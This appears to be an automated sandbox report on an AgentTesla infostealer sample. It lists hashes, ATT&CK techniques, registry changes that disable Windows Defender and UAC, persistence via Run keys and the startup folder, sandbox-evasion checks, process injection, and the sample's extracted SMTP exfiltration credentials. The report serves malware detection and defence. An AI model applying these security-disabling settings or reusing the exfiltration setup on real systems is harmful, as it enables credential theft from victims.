agenttesla | e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5

Analysis

max time kernel
101s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-01-2025 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Size

1.7MB
MD5

9091d550f7b9f77815e4ff83881a7447
SHA1

5ad66e47924d2d4d9cc136bbbfac15474ed3ece9
SHA256

e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5
SHA512

3b02d962560158da631ea6dfff34951bf82db42138bac406412d483f3042ba161a203688874b051ee520bd425b6e9be0e053c00ec260b887241d1606da7671c1
SSDEEP

24576:C8Vyk2acyB/PCTz+s3r54xvEGklY6Zj+Ww66htUA2jycJHOpG2lEYYg47qI9KUef:vdcUHC3Avy5A66hmXHOpIY47qI9rC

Score

10^/10

agenttesla collection defense_evasion discovery evasion execution keylogger persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.privateemail.com
Port:
587
Username:
[email protected]
Password:
alibaba.com

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Agenttesla family
agenttesla
Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe

Turns off Windows Defender SpyNet reporting 2 TTPs
evasion

Disable or Modify Tools
T1562.001

Modify Registry
T1112

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	7B71FC14.exe

Windows security bypass 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\7957F23F\svchost.exe = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe

AgentTesla payload 1 IoCs

resource	yara_rule
behavioral2/memory/3192-38-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla

Detected Nirsoft tools 1 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/files/0x0007000000023ca8-15.dat	Nirsoft

Looks for VirtualBox Guest Additions in registry 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions	7B71FC14.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1264	powershell.exe
4112	powershell.exe
1816	powershell.exe
1948	powershell.exe
1952	powershell.exe
3012	powershell.exe
3396	powershell.exe
2904	powershell.exe
4548	powershell.exe
4596	powershell.exe
628	powershell.exe
536	powershell.exe
2436	powershell.exe

Looks for VMWare Tools registry key 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools	7B71FC14.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7B71FC14.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7B71FC14.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	AdvancedRun.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	7B71FC14.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe

Executes dropped EXE 5 IoCs

pid	Process
3932	AdvancedRun.exe
3384	AdvancedRun.exe
2564	7B71FC14.exe
3020	AdvancedRun.exe
3504	7B71FC14.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 12 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\7957F23F\svchost.exe = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	7B71FC14.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	7B71FC14.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	7B71FC14.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\7B71FC14 = "C:\\Program Files\\Common Files\\System\\7957F23F\\svchost.exe"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\7B71FC14 = "C:\\Program Files\\Common Files\\System\\7957F23F\\svchost.exe"	7B71FC14.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7B71FC14.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	7B71FC14.exe

Maps connected drives based on registry 3 TTPs 4 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	7B71FC14.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	7B71FC14.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2340 set thread context of 3192	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	106
PID 2564 set thread context of 3504	2564	7B71FC14.exe	147

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\System\7957F23F\svchost.exe	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe

Launches sc.exe 22 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2436	sc.exe
4128	sc.exe
4244	sc.exe
4080	sc.exe
2880	sc.exe
2684	sc.exe
1524	sc.exe
4212	sc.exe
3972	sc.exe
5092	sc.exe
1256	sc.exe
2340	sc.exe
5072	sc.exe
4720	sc.exe
4940	sc.exe
2644	sc.exe
4616	sc.exe
3096	sc.exe
4004	sc.exe
4512	sc.exe
3452	sc.exe
2968	sc.exe

Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
3932	AdvancedRun.exe
3020	AdvancedRun.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1612	2564	WerFault.exe	99

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7B71FC14.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdvancedRun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdvancedRun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7B71FC14.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdvancedRun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 57 IoCs

pid	Process
3932	AdvancedRun.exe
3932	AdvancedRun.exe
3932	AdvancedRun.exe
3932	AdvancedRun.exe
3384	AdvancedRun.exe
3384	AdvancedRun.exe
3384	AdvancedRun.exe
3384	AdvancedRun.exe
3012	powershell.exe
3396	powershell.exe
2904	powershell.exe
2904	powershell.exe
3192	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
3192	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
3192	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
1264	powershell.exe
1264	powershell.exe
4112	powershell.exe
4112	powershell.exe
4548	powershell.exe
4548	powershell.exe
4596	powershell.exe
4596	powershell.exe
628	powershell.exe
628	powershell.exe
3012	powershell.exe
3012	powershell.exe
3396	powershell.exe
3396	powershell.exe
2904	powershell.exe
1264	powershell.exe
4112	powershell.exe
4596	powershell.exe
628	powershell.exe
4548	powershell.exe
3020	AdvancedRun.exe
3020	AdvancedRun.exe
3020	AdvancedRun.exe
3020	AdvancedRun.exe
1816	powershell.exe
1816	powershell.exe
1948	powershell.exe
1948	powershell.exe
536	powershell.exe
536	powershell.exe
3504	7B71FC14.exe
3504	7B71FC14.exe
3504	7B71FC14.exe
2436	powershell.exe
2436	powershell.exe
1952	powershell.exe
1952	powershell.exe
1816	powershell.exe
536	powershell.exe
1948	powershell.exe
2436	powershell.exe
1952	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	3932	AdvancedRun.exe
Token: SeImpersonatePrivilege	3932	AdvancedRun.exe
Token: SeDebugPrivilege	3384	AdvancedRun.exe
Token: SeImpersonatePrivilege	3384	AdvancedRun.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	3396	powershell.exe
Token: SeDebugPrivilege	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	3192	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeDebugPrivilege	3020	AdvancedRun.exe
Token: SeImpersonatePrivilege	3020	AdvancedRun.exe
Token: SeDebugPrivilege	2564	7B71FC14.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	3504	7B71FC14.exe
Token: SeDebugPrivilege	1952	powershell.exe
Token: SeDebugPrivilege	2436	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 3932	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	83
PID 2340 wrote to memory of 3932	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	83
PID 2340 wrote to memory of 3932	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	83
PID 3932 wrote to memory of 3384	3932	AdvancedRun.exe	84
PID 3932 wrote to memory of 3384	3932	AdvancedRun.exe	84
PID 3932 wrote to memory of 3384	3932	AdvancedRun.exe	84
PID 2340 wrote to memory of 3012	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	89
PID 2340 wrote to memory of 3012	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	89
PID 2340 wrote to memory of 3012	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	89
PID 2340 wrote to memory of 3396	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	91
PID 2340 wrote to memory of 3396	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	91
PID 2340 wrote to memory of 3396	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	91
PID 2340 wrote to memory of 2904	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	93
PID 2340 wrote to memory of 2904	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	93
PID 2340 wrote to memory of 2904	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	93
PID 2340 wrote to memory of 1264	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	95
PID 2340 wrote to memory of 1264	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	95
PID 2340 wrote to memory of 1264	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	95
PID 2340 wrote to memory of 4112	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	97
PID 2340 wrote to memory of 4112	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	97
PID 2340 wrote to memory of 4112	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	97
PID 2340 wrote to memory of 2564	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	99
PID 2340 wrote to memory of 2564	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	99
PID 2340 wrote to memory of 2564	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	99
PID 2340 wrote to memory of 4548	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	100
PID 2340 wrote to memory of 4548	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	100
PID 2340 wrote to memory of 4548	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	100
PID 2340 wrote to memory of 4596	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	102
PID 2340 wrote to memory of 4596	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	102
PID 2340 wrote to memory of 4596	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	102
PID 2340 wrote to memory of 628	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	104
PID 2340 wrote to memory of 628	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	104
PID 2340 wrote to memory of 628	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	104
PID 2340 wrote to memory of 3192	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	106
PID 2340 wrote to memory of 3192	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	106
PID 2340 wrote to memory of 3192	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	106
PID 2340 wrote to memory of 3192	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	106
PID 2340 wrote to memory of 3192	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	106
PID 2340 wrote to memory of 3192	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	106
PID 2340 wrote to memory of 3192	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	106
PID 2340 wrote to memory of 3192	2340	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe	106
PID 2564 wrote to memory of 3020	2564	7B71FC14.exe	109
PID 2564 wrote to memory of 3020	2564	7B71FC14.exe	109
PID 2564 wrote to memory of 3020	2564	7B71FC14.exe	109
PID 5000 wrote to memory of 1524	5000	cmd.exe	139
PID 5000 wrote to memory of 1524	5000	cmd.exe	139
PID 5000 wrote to memory of 3452	5000	cmd.exe	116
PID 5000 wrote to memory of 3452	5000	cmd.exe	116
PID 5000 wrote to memory of 5072	5000	cmd.exe	117
PID 5000 wrote to memory of 5072	5000	cmd.exe	117
PID 5000 wrote to memory of 4212	5000	cmd.exe	118
PID 5000 wrote to memory of 4212	5000	cmd.exe	118
PID 5000 wrote to memory of 2436	5000	cmd.exe	143
PID 5000 wrote to memory of 2436	5000	cmd.exe	143
PID 5000 wrote to memory of 3096	5000	cmd.exe	120
PID 5000 wrote to memory of 3096	5000	cmd.exe	120
PID 5000 wrote to memory of 2968	5000	cmd.exe	121
PID 5000 wrote to memory of 2968	5000	cmd.exe	121
PID 5000 wrote to memory of 4720	5000	cmd.exe	122
PID 5000 wrote to memory of 4720	5000	cmd.exe	122
PID 5000 wrote to memory of 1256	5000	cmd.exe	146
PID 5000 wrote to memory of 1256	5000	cmd.exe	146
PID 5000 wrote to memory of 4128	5000	cmd.exe	124
PID 5000 wrote to memory of 4128	5000	cmd.exe	124

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	7B71FC14.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	7B71FC14.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	7B71FC14.exe

C:\Users\Admin\AppData\Local\Temp\e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
"C:\Users\Admin\AppData\Local\Temp\e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Windows security bypass
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2340
